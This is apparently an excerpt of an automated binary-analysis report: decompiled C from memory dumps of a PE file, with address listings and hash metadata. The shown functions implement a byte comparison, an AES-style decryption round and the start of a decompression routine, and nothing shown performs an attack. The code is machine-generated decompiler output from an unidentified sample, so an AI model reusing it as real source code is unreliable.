    										if(_t281 == 0) {
    											L69:
    											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
    											if(_t283 == 0) {
    												L71:
    												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
    												if(_t285 == 0) {
    													L73:
    													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
    													if(_t228 != 0) {
    														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
    													}
    													goto L76;
    												}
    												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
    												if(_t228 != 0) {
    													goto L78;
    												}
    												goto L73;
    											}
    											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
    											if(_t228 != 0) {
    												goto L78;
    											}
    											goto L71;
    										}
    										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
    										if(_t228 != 0) {
    											goto L78;
    										}
    										goto L69;
    									}
    									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
    									if(_t287 == 0) {
    										L58:
    										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
    										if(_t289 == 0) {
    											L60:
    											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
    											if(_t291 == 0) {
    												L62:
    												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
    												if(_t228 != 0) {
    													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
    												}
    												goto L65;
    											}
    											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
    											if(_t228 != 0) {
    												goto L78;
    											}
    											goto L62;
    										}
    										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
    										if(_t228 != 0) {
    											goto L78;
    										}
    										goto L60;
    									}
    									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
    									if(_t228 != 0) {
    										goto L78;
    									}
    									goto L58;
    								}
    								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
    								if(_t293 == 0) {
    									L47:
    									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
    									if(_t295 == 0) {
    										L49:
    										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
    										if(_t297 == 0) {
    											L51:
    											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
    											if(_t228 != 0) {
    												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
    											}
    											goto L54;
    										}
    										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
    										if(_t228 != 0) {
    											goto L78;
    										}
    										goto L51;
    									}
    									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
    									if(_t228 != 0) {
    										goto L78;
    									}
    									goto L49;
    								}
    								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
    								if(_t228 != 0) {
    									goto L78;
    								}
    								goto L47;
    							}
    							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
    							if(_t299 == 0) {
    								L36:
    								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
    								if(_t301 == 0) {
    									L38:
    									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
    									if(_t303 == 0) {
    										L40:
    										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
    										if(_t228 != 0) {
    											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
    										}
    										goto L43;
    									}
    									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
    									if(_t228 != 0) {
    										goto L78;
    									}
    									goto L40;
    								}
    								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
    								if(_t228 != 0) {
    									goto L78;
    								}
    								goto L38;
    							}
    							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
    							if(_t228 != 0) {
    								goto L78;
    							}
    							goto L36;
    						}
    						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
    						if(_t305 == 0) {
    							L25:
    							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
    							if(_t307 == 0) {
    								L27:
    								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
    								if(_t309 == 0) {
    									L29:
    									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
    									if(_t228 != 0) {
    										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
    									}
    									goto L32;
    								}
    								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
    								if(_t228 != 0) {
    									goto L78;
    								}
    								goto L29;
    							}
    							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
    							if(_t228 != 0) {
    								goto L78;
    							}
    							goto L27;
    						}
    						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
    						if(_t228 != 0) {
    							goto L78;
    						}
    						goto L25;
    					}
    					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
    					if(_t311 == 0) {
    						L14:
    						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
    						if(_t313 == 0) {
    							L16:
    							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
    							if(_t315 == 0) {
    								L18:
    								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
    								if(_t228 != 0) {
    									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
    								}
    								goto L21;
    							}
    							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
    							if(_t228 != 0) {
    								goto L78;
    							}
    							goto L18;
    						}
    						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
    						if(_t228 != 0) {
    							goto L78;
    						}
    						goto L16;
    					}
    					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
    					if(_t228 != 0) {
    						goto L78;
    					}
    					goto L14;
    				}
    				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
    				if(_t317 == 0) {
    					L3:
    					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
    					if(_t319 == 0) {
    						L5:
    						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
    						if(_t321 == 0) {
    							L7:
    							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
    							if(_t228 != 0) {
    								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
    							}
    							goto L10;
    						}
    						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
    						if(_t228 != 0) {
    							goto L78;
    						}
    						goto L7;
    					}
    					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
    					if(_t228 != 0) {
    						goto L78;
    					}
    					goto L5;
    				}
    				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
    				if(_t228 != 0) {
    					goto L78;
    				}
    				goto L3;
    			}


































    0x0084f8c6
    0x0084f8c6
    0x0084f8c6
    0x0084f8cc
    0x0084f953
    0x0084f955
    0x0084f957
    0x0084fcd6
    0x0084fcd6
    0x00850ac7
    0x00850ac7
    0x0084f95d
    0x0084f963
    0x0084f9ea
    0x0084f9ec
    0x0084f9ee
    0x00000000
    0x00000000
    0x0084f9f4
    0x0084f9fa
    0x0084fa81
    0x0084fa83
    0x0084fa85
    0x00000000
    0x00000000
    0x0084fa8b
    0x0084fa91
    0x0084fb18
    0x0084fb1a
    0x0084fb1c
    0x00000000
    0x00000000
    0x0084fb28
    0x0084fbb0
    0x0084fbb2
    0x0084fbb4
    0x00000000
    0x00000000
    0x0084fbba
    0x0084fbc0
    0x0084fc47
    0x0084fc49
    0x0084fc4b
    0x00000000
    0x00000000
    0x0084fc51
    0x0084fc57
    0x0084fcce
    0x0084fcd0
    0x0084fcd2
    0x0084fcd4
    0x0084fcd4
    0x00000000
    0x0084fcd2
    0x0084fc60
    0x0084fc62
    0x0084fc76
    0x0084fc7e
    0x0084fc80
    0x0084fc94
    0x0084fc9c
    0x0084fc9e
    0x0084fcb2
    0x0084fcba
    0x0084fcbc
    0x0084fcc5
    0x0084fcc5
    0x00000000
    0x0084fcbc
    0x0084fca7
    0x0084fcb0
    0x00000000
    0x00000000
    0x00000000
    0x0084fcb0
    0x0084fc89
    0x0084fc92
    0x00000000
    0x00000000
    0x00000000
    0x0084fc92
    0x0084fc6b
    0x0084fc74
    0x00000000
    0x00000000
    0x00000000
    0x0084fc74
    0x0084fbcd
    0x0084fbcf
    0x0084fbe7
    0x0084fbef
    0x0084fbf1
    0x0084fc09
    0x0084fc11
    0x0084fc13
    0x0084fc2b
    0x0084fc33
    0x0084fc35
    0x0084fc3e
    0x0084fc3e
    0x00000000
    0x0084fc35
    0x0084fc1c
    0x0084fc25
    0x00000000
    0x00000000
    0x00000000
    0x0084fc25
    0x0084fbfa
    0x0084fc03
    0x00000000
    0x00000000
    0x00000000
    0x0084fc03
    0x0084fbd8
    0x0084fbe1
    0x00000000
    0x00000000
    0x00000000
    0x0084fbe1
    0x0084fb36
    0x0084fb38
    0x0084fb50
    0x0084fb58
    0x0084fb5a
    0x0084fb72
    0x0084fb7a
    0x0084fb7c
    0x0084fb94
    0x0084fb9c
    0x0084fb9e
    0x0084fba7
    0x0084fba7
    0x00000000
    0x0084fb9e
    0x0084fb85
    0x0084fb8e
    0x00000000
    0x00000000
    0x00000000
    0x0084fb8e
    0x0084fb63
    0x0084fb6c
    0x00000000
    0x00000000
    0x00000000
    0x0084fb6c
    0x0084fb41
    0x0084fb4a
    0x00000000
    0x00000000
    0x00000000
    0x0084fb4a
    0x0084fa9e
    0x0084faa0
    0x0084fab8
    0x0084fac0
    0x0084fac2
    0x0084fada
    0x0084fae2
    0x0084fae4
    0x0084fafc
    0x0084fb04
    0x0084fb06
    0x0084fb0f
    0x0084fb0f
    0x00000000
    0x0084fb06
    0x0084faed
    0x0084faf6
    0x00000000
    0x00000000
    0x00000000
    0x0084faf6
    0x0084facb
    0x0084fad4
    0x00000000
    0x00000000
    0x00000000
    0x0084fad4
    0x0084faa9
    0x0084fab2
    0x00000000
    0x00000000
    0x00000000
    0x0084fab2
    0x0084fa07
    0x0084fa09
    0x0084fa21
    0x0084fa29
    0x0084fa2b
    0x0084fa43
    0x0084fa4b
    0x0084fa4d
    0x0084fa65
    0x0084fa6d
    0x0084fa6f
    0x0084fa78
    0x0084fa78
    0x00000000
    0x0084fa6f
    0x0084fa56
    0x0084fa5f
    0x00000000
    0x00000000
    0x00000000
    0x0084fa5f
    0x0084fa34
    0x0084fa3d
    0x00000000
    0x00000000
    0x00000000
    0x0084fa3d
    0x0084fa12
    0x0084fa1b
    0x00000000
    0x00000000
    0x00000000
    0x0084fa1b
    0x0084f970
    0x0084f972
    0x0084f98a
    0x0084f992
    0x0084f994
    0x0084f9ac
    0x0084f9b4
    0x0084f9b6
    0x0084f9ce
    0x0084f9d6
    0x0084f9d8
    0x0084f9e1
    0x0084f9e1
    0x00000000
    0x0084f9d8
    0x0084f9bf
    0x0084f9c8
    0x00000000
    0x00000000
    0x00000000
    0x0084f9c8
    0x0084f99d
    0x0084f9a6
    0x00000000
    0x00000000
    0x00000000
    0x0084f9a6
    0x0084f97b
    0x0084f984
    0x00000000
    0x00000000
    0x00000000
    0x0084f984
    0x0084f8d9
    0x0084f8db
    0x0084f8f3
    0x0084f8fb
    0x0084f8fd
    0x0084f915
    0x0084f91d
    0x0084f91f
    0x0084f937
    0x0084f93f
    0x0084f941
    0x0084f94a
    0x0084f94a
    0x00000000
    0x0084f941
    0x0084f928
    0x0084f931
    0x00000000
    0x00000000
    0x00000000
    0x0084f931
    0x0084f906
    0x0084f90f
    0x00000000
    0x00000000
    0x00000000
    0x0084f90f
    0x0084f8e4
    0x0084f8ed
    0x00000000
    0x00000000
    0x00000000

    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
    • Instruction ID: 74a5a3a58b38e09f04821bcdea36266149289003c9989ab63a9fc26994a51586
    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
    • Instruction Fuzzy Hash: 6BC173722051AB0ADF2D8639C57413EBAA1FBA27B131A177DD9B2CB1C6FE20C524D610
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0083DF48(void* __ebx, intOrPtr __ecx, void* __esi) {
    				void* _t222;
    				signed int _t229;
    				signed char _t253;
    				signed int _t301;
    				signed int* _t304;
    				signed int* _t309;
    				unsigned int _t313;
    				signed char _t348;
    				unsigned int _t350;
    				signed int _t353;
    				unsigned int _t356;
    				signed int* _t359;
    				signed int _t363;
    				signed int _t368;
    				signed int _t372;
    				signed int _t376;
    				signed char _t378;
    				signed int* _t382;
    				signed int _t388;
    				signed int _t394;
    				signed int _t399;
    				intOrPtr _t400;
    				signed char _t402;
    				signed char _t403;
    				signed char _t404;
    				unsigned int _t406;
    				signed int _t409;
    				signed int _t411;
    				unsigned int _t412;
    				unsigned int _t414;
    				unsigned int _t415;
    				signed int _t416;
    				signed int _t421;
    				void* _t422;
    				unsigned int _t423;
    				signed int _t426;
    				intOrPtr _t429;
    				signed int* _t430;
    				void* _t431;
    				void* _t432;
    
    				_t414 =  *(_t431 + 0x64);
    				_t429 = __ecx;
    				 *((intOrPtr*)(_t431 + 0x1c)) = __ecx;
    				if(_t414 != 0) {
    					_t415 = _t414 >> 4;
    					 *(_t431 + 0x64) = _t415;
    					if( *((char*)(__ecx)) == 0) {
    						 *((intOrPtr*)(_t431 + 0x30)) = __ecx + 8;
    						E0084EA80(_t431 + 0x54, __ecx + 8, 0x10);
    						_t432 = _t431 + 0xc;
    						if(_t415 == 0) {
    							L13:
    							return E0084EA80( *((intOrPtr*)(_t432 + 0x30)), _t432 + 0x50, 0x10);
    						}
    						_t399 =  *(_t432 + 0x60);
    						 *(_t432 + 0x1c) = _t399 + 8;
    						_t229 =  *(_t432 + 0x70);
    						_t400 = _t399 - _t229;
    						 *((intOrPtr*)(_t432 + 0x2c)) = _t400;
    						_t359 = _t229 + 8;
    						 *(_t432 + 0x20) = _t359;
    						do {
    							_t421 =  *(_t429 + 4);
    							 *(_t432 + 0x28) = _t359 + _t400 + 0xfffffff8;
    							E0083DF13(_t432 + 0x4c, _t359 + _t400 + 0xfffffff8, (_t421 << 4) + 0x18 + _t429);
    							_t402 =  *(_t432 + 0x44);
    							 *(_t432 + 0x68) =  *(0x875350 + (_t402 & 0x000000ff) * 4) ^  *(0x875f50 + ( *(_t432 + 0x4b) & 0x000000ff) * 4) ^  *(0x875b50 + ( *(_t432 + 0x4e) & 0x000000ff) * 4);
    							_t348 =  *(_t432 + 0x50);
    							_t363 =  *(_t432 + 0x68) ^  *(0x875750 + (_t348 & 0x000000ff) * 4);
    							 *(_t432 + 0x68) = _t363;
    							 *(_t432 + 0x34) = _t363;
    							_t403 =  *(_t432 + 0x48);
    							_t368 =  *(0x875750 + (_t402 & 0x000000ff) * 4) ^  *(0x875350 + (_t403 & 0x000000ff) * 4) ^  *(0x875f50 + ( *(_t432 + 0x4f) & 0x000000ff) * 4) ^  *(0x875b50 + ( *(_t432 + 0x52) & 0x000000ff) * 4);
    							 *(_t432 + 0x70) = _t368;
    							 *(_t432 + 0x38) = _t368;
    							_t404 =  *(_t432 + 0x4c);
    							 *(_t432 + 0x10) =  *(0x875b50 + ( *(_t432 + 0x46) & 0x000000ff) * 4) ^  *(0x875750 + (_t403 & 0x000000ff) * 4);
    							_t372 =  *(_t432 + 0x10) ^  *(0x875350 + (_t404 & 0x000000ff) * 4) ^  *(0x875f50 + ( *(_t432 + 0x53) & 0x000000ff) * 4);
    							 *(_t432 + 0x10) = _t372;
    							 *(_t432 + 0x3c) = _t372;
    							 *(_t432 + 0x14) =  *(0x875f50 + ( *(_t432 + 0x47) & 0x000000ff) * 4) ^  *(0x875b50 + ( *(_t432 + 0x4a) & 0x000000ff) * 4);
    							_t376 =  *(_t432 + 0x14) ^  *(0x875750 + (_t404 & 0x000000ff) * 4) ^  *(0x875350 + (_t348 & 0x000000ff) * 4);
    							_t422 = _t421 - 1;
    							 *(_t432 + 0x14) = _t376;
    							 *(_t432 + 0x40) = _t376;
    							if(_t422 <= 1) {
    								goto L9;
    							}
    							_t416 =  *(_t432 + 0x68);
    							_t309 = (_t422 + 2 << 4) + _t429;
    							 *(_t432 + 0x14) = _t309;
    							_t430 = _t309;
    							 *((intOrPtr*)(_t432 + 0x18)) = _t422 - 1;
    							do {
    								_t411 =  *_t430;
    								 *(_t432 + 0x68) =  *(_t430 - 8) ^ _t416;
    								_t430 = _t430 - 0x10;
    								_t313 = _t430[5] ^ _t376;
    								_t412 = _t411 ^  *(_t432 + 0x10);
    								 *(_t432 + 0x14) = _t313;
    								_t356 = _t430[3] ^  *(_t432 + 0x70);
    								_t416 =  *(0x875750 + (_t313 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x875b50 + (_t412 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x875f50 + (_t356 >> 0x18) * 4) ^  *(0x875350 + ( *(_t432 + 0x68) & 0x000000ff) * 4);
    								 *(_t432 + 0x34) = _t416;
    								 *(_t432 + 0x70) =  *(0x875b50 + ( *(_t432 + 0x14) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x875f50 + (_t412 >> 0x18) * 4);
    								_t388 =  *(_t432 + 0x70) ^  *(0x875750 + ( *(_t432 + 0x68) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x875350 + (_t356 & 0x000000ff) * 4);
    								 *(_t432 + 0x70) = _t388;
    								 *(_t432 + 0x38) = _t388;
    								_t394 =  *(0x875f50 + ( *(_t432 + 0x14) >> 0x18) * 4) ^  *(0x875750 + (_t356 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x875b50 + ( *(_t432 + 0x68) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x875350 + (_t412 & 0x000000ff) * 4);
    								 *(_t432 + 0x10) = _t394;
    								 *(_t432 + 0x3c) = _t394;
    								_t376 =  *(0x875750 + (_t412 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x875b50 + (_t356 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x875f50 + ( *(_t432 + 0x68) >> 0x18) * 4) ^  *(0x875350 + ( *(_t432 + 0x14) & 0x000000ff) * 4);
    								_t135 = _t432 + 0x18;
    								 *_t135 =  *((intOrPtr*)(_t432 + 0x18)) - 1;
    								 *(_t432 + 0x40) = _t376;
    							} while ( *_t135 != 0);
    							_t429 =  *((intOrPtr*)(_t432 + 0x24));
    							 *(_t432 + 0x68) = _t416;
    							_t415 =  *(_t432 + 0x6c);
    							 *(_t432 + 0x14) = _t376;
    							L9:
    							_t253 =  *(_t429 + 0x28) ^  *(_t432 + 0x68);
    							 *(_t432 + 0x6c) = _t253;
    							 *(_t432 + 0x44) = _t253;
    							_t378 =  *(_t429 + 0x34) ^  *(_t432 + 0x14);
    							 *(_t432 + 0x34) =  *((intOrPtr*)((_t253 & 0x000000ff) + 0x874230));
    							_t406 =  *(_t429 + 0x30) ^  *(_t432 + 0x10);
    							_t350 =  *(_t429 + 0x2c) ^  *(_t432 + 0x70);
    							 *((char*)(_t432 + 0x35)) =  *((intOrPtr*)((_t378 >> 0x00000008 & 0x000000ff) + 0x874230));
    							_t423 =  *(_t432 + 0x6c);
    							 *(_t432 + 0x4c) = _t406;
    							 *(_t432 + 0x48) = _t350;
    							 *((char*)(_t432 + 0x36)) =  *((intOrPtr*)((_t406 >> 0x00000010 & 0x000000ff) + 0x874230));
    							 *(_t432 + 0x50) = _t378;
    							 *((char*)(_t432 + 0x37)) =  *((intOrPtr*)((_t350 >> 0x18) + 0x874230));
    							 *(_t432 + 0x38) =  *((intOrPtr*)((_t350 & 0x000000ff) + 0x874230));
    							 *((char*)(_t432 + 0x39)) =  *((intOrPtr*)((_t423 >> 0x00000008 & 0x000000ff) + 0x874230));
    							 *((char*)(_t432 + 0x3a)) =  *((intOrPtr*)((_t378 >> 0x00000010 & 0x000000ff) + 0x874230));
    							_t170 = (_t406 >> 0x18) + 0x874230; // 0x54cbe9de
    							 *((char*)(_t432 + 0x3b)) =  *_t170;
    							 *(_t432 + 0x3c) =  *((intOrPtr*)((_t406 & 0x000000ff) + 0x874230));
    							 *((char*)(_t432 + 0x3d)) =  *((intOrPtr*)((_t350 >> 0x00000008 & 0x000000ff) + 0x874230));
    							 *((char*)(_t432 + 0x3e)) =  *((intOrPtr*)((_t423 >> 0x00000010 & 0x000000ff) + 0x874230));
    							 *((char*)(_t432 + 0x3f)) =  *((intOrPtr*)((_t378 >> 0x18) + 0x874230));
    							 *(_t432 + 0x40) =  *((intOrPtr*)((_t378 & 0x000000ff) + 0x874230));
    							_t409 =  *(_t432 + 0x34) ^  *(_t429 + 0x18);
    							 *((char*)(_t432 + 0x41)) =  *((intOrPtr*)((_t406 >> 0x00000008 & 0x000000ff) + 0x874230));
    							 *((char*)(_t432 + 0x42)) =  *((intOrPtr*)((_t350 >> 0x00000010 & 0x000000ff) + 0x874230));
    							 *((char*)(_t432 + 0x43)) =  *((intOrPtr*)((_t423 >> 0x18) + 0x874230));
    							_t301 =  *(_t432 + 0x40) ^  *(_t429 + 0x24);
    							_t426 =  *(_t432 + 0x38) ^  *(_t429 + 0x1c);
    							_t353 =  *(_t432 + 0x3c) ^  *(_t429 + 0x20);
    							 *(_t432 + 0x6c) = _t301;
    							if( *((char*)(_t429 + 1)) != 0) {
    								_t409 = _t409 ^  *(_t432 + 0x54);
    								_t426 = _t426 ^  *(_t432 + 0x58);
    								_t353 = _t353 ^  *(_t432 + 0x5c);
    								 *(_t432 + 0x6c) = _t301 ^  *(_t432 + 0x60);
    							}
    							 *(_t432 + 0x54) =  *( *(_t432 + 0x28));
    							_t304 =  *(_t432 + 0x1c);
    							 *(_t432 + 0x58) =  *(_t304 - 4);
    							 *(_t432 + 0x5c) =  *_t304;
    							 *(_t432 + 0x60) = _t304[1];
    							_t382 =  *(_t432 + 0x20);
    							 *(_t432 + 0x1c) =  &(_t304[4]);
    							 *(_t382 - 8) = _t409;
    							_t382[1] =  *(_t432 + 0x6c);
    							_t400 =  *((intOrPtr*)(_t432 + 0x2c));
    							 *(_t382 - 4) = _t426;
    							 *_t382 = _t353;
    							_t359 =  &(_t382[4]);
    							_t415 = _t415 - 1;
    							 *(_t432 + 0x20) = _t359;
    							 *(_t432 + 0x6c) = _t415;
    						} while (_t415 != 0);
    						goto L13;
    					}
    					return E0083E40A(__ecx,  *((intOrPtr*)(_t431 + 0x68)), _t415,  *((intOrPtr*)(_t431 + 0x68)));
    				}
    				return _t222;
    			}











































    0x0083df4d
    0x0083df51
    0x0083df53
    0x0083df59
    0x0083df5f
    0x0083df66
    0x0083df6a
    0x0083df85
    0x0083df8e
    0x0083df93
    0x0083df98
    0x0083e3ef
    0x00000000
    0x0083e3ff
    0x0083df9e
    0x0083dfa7
    0x0083dfab
    0x0083dfaf
    0x0083dfb1
    0x0083dfb5
    0x0083dfb8
    0x0083dfbc
    0x0083dfbc
    0x0083dfcc
    0x0083dfd9
    0x0083dfde
    0x0083e004
    0x0083e008
    0x0083e013
    0x0083e01a
    0x0083e01e
    0x0083e025
    0x0083e04b
    0x0083e057
    0x0083e05b
    0x0083e069
    0x0083e074
    0x0083e08b
    0x0083e097
    0x0083e09b
    0x0083e0b2
    0x0083e0c7
    0x0083e0ce
    0x0083e0cf
    0x0083e0d3
    0x0083e0da
    0x00000000
    0x00000000
    0x0083e0e0
    0x0083e0ea
    0x0083e0ed
    0x0083e0f1
    0x0083e0f3
    0x0083e0f7
    0x0083e0fc
    0x0083e0ff
    0x0083e103
    0x0083e109
    0x0083e10b
    0x0083e10f
    0x0083e11e
    0x0083e14e
    0x0083e15f
    0x0083e171
    0x0083e18d
    0x0083e196
    0x0083e19a
    0x0083e1d3
    0x0083e1da
    0x0083e1de
    0x0083e20b
    0x0083e212
    0x0083e212
    0x0083e217
    0x0083e217
    0x0083e221
    0x0083e225
    0x0083e229
    0x0083e22d
    0x0083e231
    0x0083e234
    0x0083e238
    0x0083e23c
    0x0083e246
    0x0083e253
    0x0083e25f
    0x0083e266
    0x0083e270
    0x0083e27c
    0x0083e280
    0x0083e284
    0x0083e28e
    0x0083e297
    0x0083e2a1
    0x0083e2ae
    0x0083e2c0
    0x0083e2d2
    0x0083e2db
    0x0083e2e1
    0x0083e2f1
    0x0083e306
    0x0083e31b
    0x0083e32a
    0x0083e337
    0x0083e342
    0x0083e34b
    0x0083e358
    0x0083e362
    0x0083e372
    0x0083e375
    0x0083e378
    0x0083e37f
    0x0083e383
    0x0083e385
    0x0083e389
    0x0083e38d
    0x0083e395
    0x0083e395
    0x0083e39f
    0x0083e3a3
    0x0083e3aa
    0x0083e3b0
    0x0083e3ba
    0x0083e3be
    0x0083e3c2
    0x0083e3c6
    0x0083e3cd
    0x0083e3d0
    0x0083e3d4
    0x0083e3d7
    0x0083e3d9
    0x0083e3dc
    0x0083e3df
    0x0083e3e3
    0x0083e3e3
    0x00000000
    0x0083e3ee
    0x00000000
    0x0083df75
    0x0083e407

    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 8a452170c2d8c02d73a31f96a3e35b5a547ac0b6890e4718758f0bd23aafedc1
    • Instruction ID: 233c1cee6f1f43f6c72550e8c812b9b3a13c63dea5e129bc96053527bfbeede8
    • Opcode Fuzzy Hash: 8a452170c2d8c02d73a31f96a3e35b5a547ac0b6890e4718758f0bd23aafedc1
    • Instruction Fuzzy Hash: E8E146755183808FC304CF29E89086ABBF0BBCA301F89095EF9D987356D375E955CBA2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 78%
    			E008436C1(void* __ecx, void* __edx) {
    				void* __edi;
    				signed int _t82;
    				signed int _t88;
    				signed int _t93;
    				signed int _t94;
    				signed int _t95;
    				signed int _t98;
    				signed int _t99;
    				intOrPtr _t116;
    				signed int _t127;
    				void* _t135;
    				signed int _t137;
    				signed int _t138;
    				signed int _t148;
    				signed int _t150;
    				void* _t152;
    				signed int _t155;
    				signed int _t156;
    				intOrPtr* _t157;
    				intOrPtr* _t166;
    				signed int _t169;
    				void* _t170;
    				signed int _t173;
    				void* _t178;
    				unsigned int _t180;
    				signed int _t183;
    				intOrPtr* _t184;
    				void* _t185;
    				signed int _t187;
    				signed int _t188;
    				intOrPtr* _t189;
    				signed int _t192;
    				signed int _t198;
    				void* _t201;
    
    				_t178 = __edx;
    				_t185 = __ecx;
    				_t184 = __ecx + 4;
    				if( *_t184 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
    					L2:
    					E0083A575(_t184,  ~( *(_t185 + 8)) & 0x00000007);
    					_t82 = E0083A58C(_t184);
    					_t205 = _t82 & 0x00008000;
    					if((_t82 & 0x00008000) == 0) {
    						_t137 = 0;
    						 *((intOrPtr*)(_t185 + 0xe65c)) = 0;
    						 *((intOrPtr*)(_t185 + 0x98d0)) = 0;
    						 *((intOrPtr*)(_t185 + 0x98d4)) = 0;
    						__eflags = _t82 & 0x00004000;
    						if((_t82 & 0x00004000) == 0) {
    							E0084E920(_t184, _t185 + 0xe4c8, 0, 0x194);
    							_t201 = _t201 + 0xc;
    						}
    						E0083A575(_t184, 2);
    						do {
    							 *(_t201 + 0x14) = E0083A58C(_t184) >> 0x0000000c & 0x000000ff;
    							E0083A575(_t184, 4);
    							_t88 =  *(_t201 + 0x10);
    							__eflags = _t88 - 0xf;
    							if(_t88 != 0xf) {
    								 *(_t201 + _t137 + 0x14) = _t88;
    								goto L15;
    							}
    							_t187 = E0083A58C(_t184) >> 0x0000000c & 0x000000ff;
    							E0083A575(_t184, 4);
    							__eflags = _t187;
    							if(_t187 != 0) {
    								_t188 = _t187 + 2;
    								__eflags = _t188;
    								while(1) {
    									_t188 = _t188 - 1;
    									__eflags = _t137 - 0x14;
    									if(_t137 >= 0x14) {
    										break;
    									}
